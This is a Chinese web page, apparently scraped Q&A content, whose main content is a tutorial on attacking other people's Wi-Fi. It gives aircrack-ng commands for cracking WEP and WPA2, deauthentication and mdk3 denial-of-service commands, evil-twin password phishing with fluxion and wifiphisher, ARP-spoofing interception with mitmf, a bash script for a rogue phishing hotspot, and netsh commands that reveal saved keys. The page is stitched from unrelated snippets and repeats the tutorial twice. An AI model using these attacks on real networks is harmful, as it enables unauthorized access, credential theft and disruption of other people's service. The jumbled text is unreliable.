怎么攻击别人wifi?-
2024-09-12编辑:本站
怎么攻击蹭我wifi的狗杂~
我们攻击WIFI的第一个思路就是从保密性出发,我们希望从无线系统中获取用户的明文数据。首先,我们知道WIFI的的认证加密主要有以下四种方式:OPEN(无加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。
OPEN的WIFI没有采取认证加密措施,任意用户均可链接WIFI,用户数据在BSS(基本服务集)中明文传输,恶意用户没有任何门槛就可连接,然后通过中间人攻击即可获取用户的数据(SSL、SSH等需要其他工具)。如下图所示:
WEP、WPA、WPA2认证加密模式的WIFI需要破解获取密码,然后通过中间人或直接嗅探的方式获取用户明文数据。步骤就不详述了,WEP抓取IVS包,WPA/WPA2抓取handshake包。
WEP大概如下:
airodump-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕获ivs数据包
aireplay-ng -3 -b 目标AP的MAC -h 某一个连接该AP的station的MAC wlan1mon #发送ARP包获取加速获取ivs
aircrack-ng /workspace/sniff/airmon02.ivs
WPA/WPA2大概如下:
airodump-ng -w /workspace/sniff/airmon-wpa2 --bssid 目标AP的MAC -c AP所在chanle wlan1mon #嗅探无线数据,抓取handshake包
aireplay-ng -0 5 -a 目标AP的MAC -c 某一连接AP的station的MAC wlan1mon #发送deauth包,更快的获取handshake
aircrack-ng -w 你的字典文件 /workspace/sniff/airmon-wpa2.cap #破解wpa2密码
密码破解成功后即可连接AP,通过中间人的方式获取用户明文数据,或者直接用wireshark抓取加密包,然后通过airdecap-ng工具解密,然后用wireshark读取已经解密的数据包。
破解WPA、WPA2不一定成功,取决于你字典是否强大,此时我们可以想办法诱骗用户主动输入WIFI密码,比如我们创建一个和目标AP具有同样ESSID的软AP,用户可以连接上,单在浏览网页时会弹出一个虚假的认证页面,告诉用户必须输入WIFI的密码,用户只要输入密码我们即可获取。可以利用fluxion、wifiphisher等工具实现。
wifiphisher将用户输入的密码当做WIFI的密码,但此密码并没有去验证,如果用户输入错误,也会提示出该密码。
而fluxion会将用户输入的密码与handshake校验,成功方认为获取到密码。
2.可用性
通过使目标用户无法使用WIFI来破坏无线系统的可用性,通常通过DOS攻击来实现,比如发送大量的deauth包来迫使用户station与AP解除认证、连接。
aireplay -0 100 -a 目标AP的MAC -c攻击的station的MAC wlan1mon #发送大量的deauth包,迫使目标station无法连接AP
mdk3 wlan1mon a -a 攻击AP的MAC #mdk3可以伪造大量的station与AP连接,从而耗尽AP的资源造成DOS攻击
3.真实性
(1)恶意用户进入无线系统后,可通过中间人攻击获取或修改用户数据。
ARP欺骗或DNS欺骗,ettercap工具非常方便。下面采用mitmf工具通过ARP欺骗将目标浏览网页中的所有图片上下颠倒。
mitmf -i wlan0 --spoof --arp --gateway 192.168.2.1 --target 192.168.2.1 --upsidedownternet
通过driftnet工具抓取目标浏览网页时的图片
driftnet -i wlan0
当然还可以利用中间人攻击做很多事情,比如获取cookie,嵌入js,结合beef进一步攻击等等。。。
(2)伪造AP进行钓鱼攻击
airbase -ng -e airmon wlan1mon #创建钓鱼热点
然后通过下面的脚本开启dhcp服务器(必须先安装isc-dhcp-server),开启路由,开启系统转发,开启防火墙nat等。
1 #!/bin/bash 2 3 echo '配置钓鱼热点...' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpd.leases 7 touch /var/lib/dhcp/dhcpd.leases 8 9 ifconfig at0 up10 ifconfig at0 10.0.0.1 netmask 255.255.255.011 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.112 sysctl net.ipv4.ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at015 echo '等待启动dhcp服务器...'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
此时用户可以不用密码即可连接airmon热点,并可以上网,但此时可以通过嗅探at0网卡获取用户数据。
4.完整性
篡改用户数据,在WIFI攻击这块貌似用处不大。
5.不可抵赖性
用cmd输入:netsh wlan show profile
之后会有几个wife名称
选你想要“攻击的”在输入:netsh wlan show profile name="想攻击的名称" key=clear
安全设置的关键内容就是密码
(此方法只用于连过“你想攻击”的wife)
在别人家不好意思连wife的时候可以用
(不客气)
把他的猫砸了!
首先~~你得破解别人的WIFI无线的密码,其次,进入路由管理界面,你还得破解别人路由的管理密码~~最后,就算这些密码你都有了。。。。。别人一个路由恢复~你还是啥都没了。。。你说,你攻击个WIFI干啥呢?
PC上用CMD来攻击,只说这东西只有黑客会,平常人就别想了吧。
别人用手机连接了局域网内的 wifi,怎么窥视到手机中的信息数据?? 答:这看起来是很搞笑很滑稽的一件事,但是经常被用来进行钓鱼攻击,下载一些儿童色情图片等不法信息。FreeBuf科普:如何安全的使用公共WiFi?看了上面的演示和描述,你是不是和我一样觉得公共WiFi很不安全?首先,我们建议大家不要轻易的使用公共WiFi。可是,这的确是一件很难做到的事儿,当我们在公共场所还想继续上网怎么办...
如何连别人家的wifi 答:如果你家里有WiFi,那么一定会有一个路由器吧,路由器的密码还是初始状态的guest/admin么,或者被你设置成了六个8。如果我是这个攻击者,一定会想各种办法拿到你们家路由器的密码,如果运气好进去了,下一步要做的事情就是把路由器的网关设置成我自己的电脑,然后各种截获和注入。如果没有攻克路由器,...
如何攻击校园网,让自己寝室断网? 答:2、网络延迟造成的刷新失败,可以打开手机的飞行模式,五秒后再关闭,然后重新连接网络或者重启一下手机。3、网络设置没有设置好,可以拨打手机卡所属运营商,让客服发送上网设置的相关数据后根据提示设置。4、如果连接的是无线网络,那么需要查看一下手机wifi密码输入和无线路由器的上网设置是否都正确,其他...
连上别人家里的wifi会泄露自己的信息吗? 答:你可以通过字面来理解“中间人”,就是你的信息在空气中传递时先传给了一个你不认识的中间人,然后他再帮你把信息传到服务器。在这个期间内,你发现你可以正常上网,但是其实“中间人”已经把你的信息全部截取下来了。2. 如果别人家的wifi是加密的,照样可以使用中间人攻击进行一些基本的拦截,比如你...
别人家的wifi被加密了怎么破开 答:- 123456 - 12345678 - password - admin - qwerty - abc123 3. 使用破解工具 如果以上方法都不可行,你可以考虑使用专门的破解工具来尝试获取Wi-Fi密码。这些工具通常通过破解或字典攻击的方法来解码加密的Wi-Fi密码。以下是一些知名的破解工具:- Aircrack-ng - Cain and Abel - WiFi Password ...
怎么入侵别人手机 答:问题一:具备哪些条件可以入侵别人的电脑,或者手机 方法 1 面介绍一种 WIN9X 下的入侵方法 :1.取得对方 IP 地址如 XX.XX.XX.XX ,方法太多不细讲了。2.判断对方上网的地点,开个 DOS 窗口键入 TRACERT XX.XX.XX.XX 第 4 和第 5 行反映的信息既是对方的上网地点。3.得到对方电脑的名称,...
连别人的wifi会泄露哪些信息 答:连接别人的Wi-Fi可能会导致个人信息泄露,这种风险取决于多个因素,包括网络的加密程度和其他连接该Wi-Fi的人的技术能力。在之前的一次“3·15”晚会上,中央电视台报道了关于通过Wi-Fi进行中间人攻击的案例,提醒公众不要随意连接不安全的Wi-Fi,尤其是那些未加密的网络。让我们具体分析一下:1. 如果...
蹭别人家的wifl我的手机信息隐私会泄露吗? 答:蹭别人家的wifi不太可能会泄露你的手机信息。除非是黑客,一般人是不会有那么专业的技术的。 当然也要提防骗子的假Wifi信号,这个才是盗取手机信息的陷阱。
WIFI看黄会被抓吗? 答:那么,如何避免被抓呢?首先,我们需要保护好自己的家用WIFI。如果你的WIFI被别人盗用,而且他们在你的WIFI上进行不良行为,那么你也有可能会被牵连。因此,我们需要设置好WIFI的密码,避免被别人盗用。其次,我们需要避免在公共场所使用不安全的WIFI。因为,公共场所的WIFI很容易被黑客攻击,这样就会泄露我们...
别人用我的Wifi会看到我的聊天记录吗 答:然而,需要注意的是,如果WiFi网络未设置密码或密码过于简单,任何人都可以轻松接入,这可能为潜在的网络攻击打开大门。此外,如果设备或应用程序存在安全漏洞,或者用户在不安全的网站或应用中输入了敏感信息,那么这些信息就有可能被截获。为了保护个人隐私,建议采取以下措施:设置强密码并定期更换WiFi密码;...
1、彼此都是蹭wifi的人,那么也就不是wifi的主人,不是wifi的主人无法执行把对方踢出wifi连接的操作;2、如果是wifi的主人。可以在电脑下载360防蹭网或者路由器卫士,以360防蹭网为例,安装后打开软件,启动防蹭网,这时会显示发现X台未知设备,正在与您使用同一网络,如果不想对方连接,把不属于自己的设备禁止连接wifi即可。
3、安卓手机也可以下载一个wifi防蹭网软件,取得路由器的管理权限后,当有陌生终端连上家里的路由器,软件就会发送通知消息,可以查看并点击禁用,把对方踢出自己的wifi。
我们攻击WIFI的第一个思路就是从保密性出发,我们希望从无线系统中获取用户的明文数据。首先,我们知道WIFI的的认证加密主要有以下四种方式:OPEN(无加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。
OPEN的WIFI没有采取认证加密措施,任意用户均可链接WIFI,用户数据在BSS(基本服务集)中明文传输,恶意用户没有任何门槛就可连接,然后通过中间人攻击即可获取用户的数据(SSL、SSH等需要其他工具)。如下图所示:
WEP、WPA、WPA2认证加密模式的WIFI需要破解获取密码,然后通过中间人或直接嗅探的方式获取用户明文数据。步骤就不详述了,WEP抓取IVS包,WPA/WPA2抓取handshake包。
WEP大概如下:
airodump-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕获ivs数据包
aireplay-ng -3 -b 目标AP的MAC -h 某一个连接该AP的station的MAC wlan1mon #发送ARP包获取加速获取ivs
aircrack-ng /workspace/sniff/airmon02.ivs
WPA/WPA2大概如下:
airodump-ng -w /workspace/sniff/airmon-wpa2 --bssid 目标AP的MAC -c AP所在chanle wlan1mon #嗅探无线数据,抓取handshake包
aireplay-ng -0 5 -a 目标AP的MAC -c 某一连接AP的station的MAC wlan1mon #发送deauth包,更快的获取handshake
aircrack-ng -w 你的字典文件 /workspace/sniff/airmon-wpa2.cap #破解wpa2密码
密码破解成功后即可连接AP,通过中间人的方式获取用户明文数据,或者直接用wireshark抓取加密包,然后通过airdecap-ng工具解密,然后用wireshark读取已经解密的数据包。
破解WPA、WPA2不一定成功,取决于你字典是否强大,此时我们可以想办法诱骗用户主动输入WIFI密码,比如我们创建一个和目标AP具有同样ESSID的软AP,用户可以连接上,单在浏览网页时会弹出一个虚假的认证页面,告诉用户必须输入WIFI的密码,用户只要输入密码我们即可获取。可以利用fluxion、wifiphisher等工具实现。
wifiphisher将用户输入的密码当做WIFI的密码,但此密码并没有去验证,如果用户输入错误,也会提示出该密码。
而fluxion会将用户输入的密码与handshake校验,成功方认为获取到密码。
2.可用性
通过使目标用户无法使用WIFI来破坏无线系统的可用性,通常通过DOS攻击来实现,比如发送大量的deauth包来迫使用户station与AP解除认证、连接。
aireplay -0 100 -a 目标AP的MAC -c攻击的station的MAC wlan1mon #发送大量的deauth包,迫使目标station无法连接AP
mdk3 wlan1mon a -a 攻击AP的MAC #mdk3可以伪造大量的station与AP连接,从而耗尽AP的资源造成DOS攻击
3.真实性
(1)恶意用户进入无线系统后,可通过中间人攻击获取或修改用户数据。
ARP欺骗或DNS欺骗,ettercap工具非常方便。下面采用mitmf工具通过ARP欺骗将目标浏览网页中的所有图片上下颠倒。
mitmf -i wlan0 --spoof --arp --gateway 192.168.2.1 --target 192.168.2.1 --upsidedownternet
通过driftnet工具抓取目标浏览网页时的图片
driftnet -i wlan0
当然还可以利用中间人攻击做很多事情,比如获取cookie,嵌入js,结合beef进一步攻击等等。。。
(2)伪造AP进行钓鱼攻击
airbase -ng -e airmon wlan1mon #创建钓鱼热点
然后通过下面的脚本开启dhcp服务器(必须先安装isc-dhcp-server),开启路由,开启系统转发,开启防火墙nat等。
1 #!/bin/bash 2 3 echo '配置钓鱼热点...' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpd.leases 7 touch /var/lib/dhcp/dhcpd.leases 8 9 ifconfig at0 up10 ifconfig at0 10.0.0.1 netmask 255.255.255.011 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.112 sysctl net.ipv4.ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at015 echo '等待启动dhcp服务器...'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
此时用户可以不用密码即可连接airmon热点,并可以上网,但此时可以通过嗅探at0网卡获取用户数据。
4.完整性
篡改用户数据,在WIFI攻击这块貌似用处不大。
5.不可抵赖性
用cmd输入:netsh wlan show profile
之后会有几个wife名称
选你想要“攻击的”在输入:netsh wlan show profile name="想攻击的名称" key=clear
安全设置的关键内容就是密码
(此方法只用于连过“你想攻击”的wife)
在别人家不好意思连wife的时候可以用
(不客气)
把他的猫砸了!
首先~~你得破解别人的WIFI无线的密码,其次,进入路由管理界面,你还得破解别人路由的管理密码~~最后,就算这些密码你都有了。。。。。别人一个路由恢复~你还是啥都没了。。。你说,你攻击个WIFI干啥呢?
PC上用CMD来攻击,只说这东西只有黑客会,平常人就别想了吧。